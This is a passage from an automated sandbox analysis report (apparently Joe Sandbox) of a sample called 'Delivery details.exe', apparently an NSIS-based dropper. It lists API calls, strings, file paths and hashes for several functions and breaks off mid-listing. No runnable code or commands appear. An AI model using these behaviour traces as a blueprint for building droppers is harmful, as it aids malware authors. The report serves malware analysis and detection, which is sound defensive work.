EmptyClipboard.USER32 ref: 0040587B
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405887
GlobalLock.KERNEL32(00000000), ref: 00405891
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A5
GlobalUnlock.KERNEL32(00000000), ref: 004058C5
SetClipboardData.USER32(0000000D,00000000), ref: 004058D0
CloseClipboard.USER32 ref: 004058D6

Strings

(7B, xrefs: 00405841
{, xrefs: 004057B9

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: (7B${
API String ID: 4154960007-525222780
Opcode ID: 65755d25ec43e8c4b7471592c12376d51de7d54b52fa0433bd5dbe0fad765625
Instruction ID: f8c5fe522ebc9739dae7df13929d3a15495bf3740f19f89270c8c50aa4207807
Opcode Fuzzy Hash: 65755d25ec43e8c4b7471592c12376d51de7d54b52fa0433bd5dbe0fad765625
Instruction Fuzzy Hash: AFB15870900608FFDB11AFA0DD85AAE7B79FB44354F00847AFA45B61A0CB754E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00405ABE Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405AE7
lstrcatW.KERNEL32(00425730,\*.*), ref: 00405B2F
lstrcatW.KERNEL32(?,0040A014), ref: 00405B52
lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B58
FindFirstFileW.KERNELBASE(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405B68
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C08
FindClose.KERNEL32(00000000), ref: 00405C17

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405ACC
"C:\Users\user\Desktop\Delivery details.exe", xrefs: 00405ABE
\*.*, xrefs: 00405B29
0WB, xrefs: 00405B17

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Delivery details.exe"$0WB$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1271053702
Opcode ID: a369ea2e0404f4c3a3198dd56cf7874cc68d0a45c7fc7fbaad5b82e9195f06ae
Instruction ID: 07f17dd178ac6d8b62b8dc139a3c49ba2dacd8a3a96bf447fe2624e5f5ce8b98
Opcode Fuzzy Hash: a369ea2e0404f4c3a3198dd56cf7874cc68d0a45c7fc7fbaad5b82e9195f06ae
Instruction Fuzzy Hash: 1741D030904A18A6DB21AB618D89FBF7678EF42719F50813BF801B11D1D77C5982DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406ABA Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
Instruction ID: 906bff5cfe4bf8fc25f5c52b70697fc94252e662920e9b50785524ea690ef068
Opcode Fuzzy Hash: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
Instruction Fuzzy Hash: EBF17870D04229CBDF18CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004066F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405DD2,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75922EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 004066FE
FindClose.KERNEL32(00000000), ref: 0040670A

Strings

xgB, xrefs: 004066F4

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: xgB
API String ID: 2295610775-399326502
Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction ID: 551d457f2096baf6d1028c2489454c6ec1272a262abf728b5c7319079dd029a3
Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction Fuzzy Hash: DBD012315090209BC201173CBE4C85B7A989F953397128B37B466F71E0C7348C638AE8

Uniqueness

Uniqueness Score: -1.00%

Function 00403E6C Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA8
ShowWindow.USER32(?), ref: 00403EC5
DestroyWindow.USER32 ref: 00403ED9
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF5
GetDlgItem.USER32(?,?), ref: 00403F16
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F2A
IsWindowEnabled.USER32(00000000), ref: 00403F31
GetDlgItem.USER32(?,00000001), ref: 00403FDF
GetDlgItem.USER32(?,00000002), ref: 00403FE9
SetClassLongW.USER32(?,000000F2,?), ref: 00404003
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404054
GetDlgItem.USER32(?,00000003), ref: 004040FA
ShowWindow.USER32(00000000,?), ref: 0040411B
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412D
EnableWindow.USER32(?,?), ref: 00404148
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040415E
EnableMenuItem.USER32(00000000), ref: 00404165
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040417D
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404190
lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041BA
SetWindowTextW.USER32(?,00423728), ref: 004041CE
ShowWindow.USER32(?,0000000A), ref: 00404302

Strings

(7B, xrefs: 004041AA

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: (7B
API String ID: 3282139019-3251261122
Opcode ID: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
Instruction ID: 85a8b1cb5875a9f0130709c86f20b78f231723f1bf47f2e7597622744019d293
Opcode Fuzzy Hash: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
Instruction Fuzzy Hash: 88C1A1B1640200FFDB216F61EE85D2B3BA8EB95305F40053EFA41B21F0CB7959529B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403ABE Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7

lstrcatW.KERNEL32(1033,00423728), ref: 00403B3F
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\akroterion\archmugwump,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BBF
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\akroterion\archmugwump,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BD2
GetFileAttributesW.KERNEL32(: Completed), ref: 00403BDD
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\akroterion\archmugwump), ref: 00403C26

Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304

RegisterClassW.USER32(004291E0), ref: 00403C63
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7B
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CB0
ShowWindow.USER32(00000005,00000000), ref: 00403CE6
GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D12
GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D1F
RegisterClassW.USER32(004291E0), ref: 00403D28
DialogBoxParamW.USER32(?,00000000,00403E6C,00000000), ref: 00403D47

Strings

.exe, xrefs: 00403BCC
.DEFAULT\Control Panel\International, xrefs: 00403B2A
RichEdit20W, xrefs: 00403D0A, 00403D10
RichEd20, xrefs: 00403CEC
: Completed, xrefs: 00403B86, 00403B8F, 00403B9D, 00403BEC, 00403BF2
C:\Users\user\AppData\Roaming\akroterion\archmugwump, xrefs: 00403B4E, 00403B56, 00403BF9, 00403BFF, 00403C0F
1033, xrefs: 00403ADE, 00403B3A
(7B, xrefs: 00403AEA
_Nb, xrefs: 00403C42, 00403CAA
C:\Users\user\AppData\Local\Temp\, xrefs: 00403ACA
"C:\Users\user\Desktop\Delivery details.exe", xrefs: 00403AC2
RichEdit, xrefs: 00403D19
Control Panel\Desktop\ResourceLocale, xrefs: 00403AF2
RichEd32, xrefs: 00403CFA

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Delivery details.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\akroterion\archmugwump$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-245174007
Opcode ID: e253c29dc7ae3d3ec2f6130ced45f02b0c74fcfd276267be3fe5b9f48f196543
Instruction ID: afe91a4761cf59ebc4b7da6c1f2e4a45d87dcf75ce704844472433b73fc63153
Opcode Fuzzy Hash: e253c29dc7ae3d3ec2f6130ced45f02b0c74fcfd276267be3fe5b9f48f196543
Instruction Fuzzy Hash: 81619370200601BED720AF669D46E2B3A7CEB84B49F40447FFD45B62E2DB7D9912862D

Uniqueness

Uniqueness Score: -1.00%

Function 00402F14 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402F28
GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F44

Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,00438800,80000000,00000003), ref: 00405EA6
Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00402F8D
GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030D4

Strings

Error launching installer, xrefs: 00402F64
C:\Users\user\AppData\Local\Temp\, xrefs: 00402F21, 004030EC
soft, xrefs: 00403004
"C:\Users\user\Desktop\Delivery details.exe", xrefs: 00402F14
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040311D
!Y, xrefs: 0040315C
C:\Users\user\Desktop, xrefs: 00402F6F, 00402F74, 00402F7A
Null, xrefs: 0040300D
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040316B
Inst, xrefs: 00402FFB

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: !Y$"C:\Users\user\Desktop\Delivery details.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-2103261263
Opcode ID: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
Instruction ID: 409c8f22eebac3ceeba7cf51205c68f93d68dba00e9ec32c8e3ebc1c19b8881b
Opcode Fuzzy Hash: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
Instruction Fuzzy Hash: 8D61E031A00204ABDB20EF65DD85A9A7BA8EB04355F20817FF901F72D0C77C9A418BAD

Uniqueness

Uniqueness Score: -1.00%

Function 004063D2 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406513
GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,driftsresultaters,?,0040544B,driftsresultaters,00000000), ref: 00406526
SHGetSpecialFolderLocation.SHELL32(0040544B,00000000,00000000,driftsresultaters,?,0040544B,driftsresultaters,00000000), ref: 00406562
SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406570
CoTaskMemFree.OLE32(00000000), ref: 0040657B
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004065A1
lstrlenW.KERNEL32(: Completed,00000000,driftsresultaters,?,0040544B,driftsresultaters,00000000), ref: 004065F9

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040659B
driftsresultaters, xrefs: 004063F7
Software\Microsoft\Windows\CurrentVersion, xrefs: 004064E3
: Completed, xrefs: 004063FC, 004064D7, 004064DE, 004064E2, 004064FC, 004064FD, 00406512, 00406525, 00406541, 0040656C, 004065A0, 004065A6, 004065C2, 004065D5, 004065F2, 004065F8, 00406604, 00406637

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$driftsresultaters
API String ID: 717251189-3938885532
Opcode ID: a7e104a29e5f19cfde2f3cfc709b359522486d94b69a74c72ff4b660ab3b6ac0
Instruction ID: 781aa6555cb08bc9a39a1310e2b7c8a7a94b670d8f790df7948cd7d686d0a9f3
Opcode Fuzzy Hash: a7e104a29e5f19cfde2f3cfc709b359522486d94b69a74c72ff4b660ab3b6ac0
Instruction Fuzzy Hash: 52611771600101ABDF209F54ED40ABE37A5AF40314F56453FE947B62D4D73D8AA2CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,288,288,00000000,00000000,288,C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured,?,?,00000031), ref: 004017D5

Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD

Part of subcall function 00405414: lstrlenW.KERNEL32(driftsresultaters,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,driftsresultaters,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
Part of subcall function 00405414: lstrcatW.KERNEL32(driftsresultaters,00402EEC), ref: 0040546F
Part of subcall function 00405414: SetWindowTextW.USER32(driftsresultaters,driftsresultaters), ref: 00405481
Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF

Strings

C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured, xrefs: 0040179E
C:\Windows\system32\trommede.Bov, xrefs: 00401835, 00401851
288, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: 288$C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured$C:\Windows\system32\trommede.Bov
API String ID: 1941528284-3050871814
Opcode ID: 9ebfb073946ae121058b631f201891bc3017374c4b83706ff41abab8acdbf7d0
Instruction ID: 6d789f9af123ab0f865e5502c846d56d3cd3544f1fa5f1ae7e054fd30d3333f6
Opcode Fuzzy Hash: 9ebfb073946ae121058b631f201891bc3017374c4b83706ff41abab8acdbf7d0
Instruction Fuzzy Hash: E741D871510115BACF117BA5CD45EAF3679EF01328B20423FF922F10E1DB3C8A519AAE

Uniqueness

Uniqueness Score: -1.00%

Function 00405414 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(driftsresultaters,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
lstrlenW.KERNEL32(00402EEC,driftsresultaters,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
lstrcatW.KERNEL32(driftsresultaters,00402EEC), ref: 0040546F
SetWindowTextW.USER32(driftsresultaters,driftsresultaters), ref: 00405481
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF

Strings

